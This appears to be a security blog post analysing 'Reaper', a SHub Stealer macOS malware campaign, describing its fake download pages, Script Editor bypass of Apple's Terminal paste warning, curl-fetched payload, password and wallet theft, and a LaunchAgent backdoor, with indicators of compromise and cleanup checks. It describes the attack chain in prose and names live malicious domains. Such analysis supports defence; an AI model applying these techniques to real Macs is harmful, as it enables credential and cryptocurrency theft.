Reaper Bypasses Apple Security to Steal macOS Passwords and Hijack Crypto Wallets

Reaper swipes macOS passwords and crypto wallets, backdoors the machine, and pretends to be Apple, Microsoft, and Google in the same attack. Apple shipped an update in March to stop exactly this. Reaper already bypasses it.

Reaper belongs to a malware family called SHub Stealer, active since April 2025. SHub grew out of an earlier macOS stealer called MacSync, which itself was built on a foundation called Mac.c, first spotted in April 2025. Within months it turned into a commercial crime service, meaning the people who built the infrastructure rent access to different operators who run their own campaigns with their own targets and lures. Researchers at Malwarebytes, Jamf, Moonlock, and Microsoft’s Defender Security Research team had already documented earlier variants, but this version of Reaper does things none of the earlier builds could: a bypass of Apple’s latest security update, a persistent backdoor that survives reboots, and a method for permanently hijacking installed crypto wallet applications without triggering a single security warning.

The attack starts with fake download pages for WeChat and Miro, two apps a lot of people use for messaging and working together. These pages sit on three domains built to look real at first glance:

• → qq-0732gwh22[.]com (fake WeChat installer)
• → mlcrosoft[.]co[.]com (Microsoft typosquat, replacing the “i” with an “l”)
• → mlroweb[.]com (fake Miro site)

When the page loads, hidden JavaScript runs before anything else happens. The code collects IP address, location, and hardware fingerprinting data gathered through WebGL, a browser technology normally used to render graphics that also exposes detailed device information. It scans for virtual machines, VPN connections, and security tools. If the keyboard settings indicate the system is located in Russia or a neighboring country in the Commonwealth of Independent States, the malware sends a cis_blocked signal to its server and stops. The people running this campaign do not want to infect machines in those countries.

The pages also actively block anyone trying to analyze them. Opening developer tools in the browser triggers a continuous freeze that makes stepping through the code nearly impossible. If a researcher gets past that, the page replaces its own content with a Russian message that translates to Access Denied.

Before the fake installer ever runs, the page also scans which browser extensions are installed and sends that list to the operators through a hardcoded Telegram bot. The script looks specifically for 1Password, Bitwarden, LastPass, MetaMask, and Phantom. The operators know what is on the Mac before the target downloads anything.

macOS has a built-in command-line environment called Terminal, a text interface for sending direct instructions to the operating system. Apple’s Tahoe 26.4 update, released in late March, added a warning that appears when someone tries to paste a potentially dangerous command into Terminal, specifically to counter a social engineering technique called ClickFix where attackers trick people into pasting malicious commands themselves. Reaper sidesteps this entirely.

Instead of using Terminal, Reaper opens a different built-in macOS application called Script Editor, Apple’s native tool for writing and running AppleScript programs. Reaper triggers this through the applescript:// URL scheme, a way for websites to open apps directly from the browser window. When the victim clicks the fake installer button, the browser opens Script Editor with the malicious code already loaded inside it. The malicious command is buried hundreds of lines below the visible window, hidden under ASCII art and fake text. Nothing looks suspicious from the surface.

When the victim clicks “Run” in Script Editor, the screen shows a message claiming to install a security update for XProtectRemediator, an actual Apple security component, making the prompt look like routine system maintenance. While that message shows, a standard download tool called curl fetches the malicious shell script silently and executes it through zsh, another built-in macOS command interpreter. A dialog box then appears asking for the Mac’s login password. That password is captured and immediately verified using dscl . -authonly, a legitimate macOS command that checks whether credentials are correct. Only after the password passes that check does Reaper confirm success to its server and continue.

From that point, Reaper goes through the entire machine. Saved passwords from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion are all taken. The macOS Keychain, the place where the Mac stores saved passwords, website logins, and certificates, gets hit too. iCloud data, Telegram sessions, developer config files, and browser extension data all go into the same collection.

Reaper also goes through the Desktop and Documents folders and grabs files with these extensions:

• → .docx .doc .wallet .key .keys .txt .rtf .csv .xls .xlsx .json .rdp .pdf .kdbx .seed

Two of those are also found in related SHub variants and worth a closer look. KeePass is a password manager that stores all saved credentials in a single encrypted database file with the .kdbx extension. If that database sits on the local machine, Reaper takes it. The .seed extension targets cryptocurrency seed phrases, the master recovery words that give complete access to a crypto wallet from any device. Files under 2MB are taken as-is, and images up to 6MB are included too. When the total collected data exceeds 85MB, Reaper generates a script at /tmp/shub_split.sh that automatically splits the archive into 70MB chunks and uploads them one by one to the C2 server, which is the remote server the attackers control.

After the initial data theft, Reaper looks for 16 different desktop crypto wallet applications, including Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, Trezor Suite, Electrum, Coinomi, and Wasabi Wallet. When it finds one, it downloads a modified version of the wallet’s core application file from the C2 server and replaces the legitimate version. Before doing that, it removes the macOS security flag that normally warns about downloaded files using xattr -cr, and applies ad-hoc code signing, a way of marking an application as trusted without a real developer certificate, to prevent Gatekeeper from blocking the replacement. Every future launch of that wallet runs the attacker’s version. Every transaction from that point forward passes through software the operators control.

Before finishing, Reaper installs a backdoor. It creates a folder that looks exactly like the folder Google uses for automatic updates:

1

~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate

A configuration file called a LaunchAgent, which tells macOS to automatically run a program at set intervals, runs under the name com.google.keystone.agent.plist. That name is identical to Google’s own real update agent. Every 60 seconds, this script contacts the C2 server at hebsbsbzjsjshduxbs[.]xyz/api/bot/heartbeat and sends system information. If the server sends back instructions wrapped in Base64, which is just a standard way to encode data so it travels cleanly over a network, the script decodes it, writes it to a hidden file at /tmp/.c.sh, executes it with the current user’s privileges, and immediately deletes the file. No permanent trace of the executed command stays on disk. The operators can push any instruction to every infected Mac at any time, including pushing more malware or pulling out more data.

Microsoft’s Defender Security Research team found three different versions of this same SHub campaign running between January and April 2026, with more than 60 different domains used to deliver the malware in just one of those versions. The malware spread through Squarespace pages, a note-taking platform called Craft, and fake troubleshooting posts published to Medium. One of those fake pages was claudecodedoc[.]squarespace[.]com, a page impersonating Claude Code documentation. The same malware family that built Reaper used an AI coding tool as a lure.

Some versions of the SHub campaign use a Telegram bot as a backup communication channel. If all the main servers go offline, the malware fetches a fresh server address directly from a public Telegram bot page. That makes the whole infrastructure much harder to shut down permanently.

In cybersecurity, attribution is one of the hardest problems to solve reliably. IP addresses can be spoofed, tools can be shared between groups, and the way code is written in malware can be deliberately misleading. What researchers can confirm is that every version of this campaign skips the same countries, tracks each victim individually with a unique ID, and runs on infrastructure that has been growing and improving for at least two years. Who is behind it remains an open question.

ClickFix attacks, the category Reaper belongs to, increased 517% in 2025 according to ESET. Moonlock Lab tracked a 67% increase in macOS backdoor variants and a 17% increase in stealer variants in 2025. macOS is not the safe platform it was once considered.

What to check and what to do

To check for the backdoor, open Terminal and run:

1

ls ~/Library/Application\ Support/Google/GoogleUpdate.app/Contents/MacOS/

If that directory exists and Google Chrome is not installed on the machine, that is a serious red flag. Also run:

1

ls ~/Library/LaunchAgents/ | grep google

If com.google.keystone.agent.plist appears without any Google software installed, remove the file and the associated GoogleUpdate directory.

Block this C2 domain at the network or DNS level:

• → hebsbsbzjsjshduxbs[.]xyz

SentinelOne published the following identifiers for detecting Reaper:

• → Build name: Reaper
• → Build hash: c917fcf8314228862571f80c9e4a871e
• → Build ID: 6552824c59ddacb134073f24a4bd4724514a938a9dc59f1733503642faed3bd3

Do not visit or download from these fake sites:

• → qq-0732gwh22[.]com
• → mlcrosoft[.]co[.]com
• → mlroweb[.]com

If a Mac has been infected, every password and credential on that machine should be changed from a separate, clean device. Any crypto wallet that was installed at the time of infection should be considered compromised, even if the wallet app looked normal afterward. The seed phrase for any affected wallet should be moved to a new wallet on a device that was never on the same network.

macOS does not deliver security updates through browser-triggered scripts. Apple does not ask anyone to open Script Editor and click “Run” to install anything. If a website opens Script Editor or asks to run any script, close the browser.

The attack chain Reaper uses runs straight through topics the course covers: building convincing fake sites and spoofing domains, running malicious commands through trusted system tools that security software rarely questions, stealing credentials, and staying hidden after the initial compromise. If understanding how attackers pull this off is what you are after, this is where to start:

→ Join my complete ethical hacking course

Hacking is not a hobby but a way of life. 🎯

Sources: SentinelOne | Microsoft Security Blog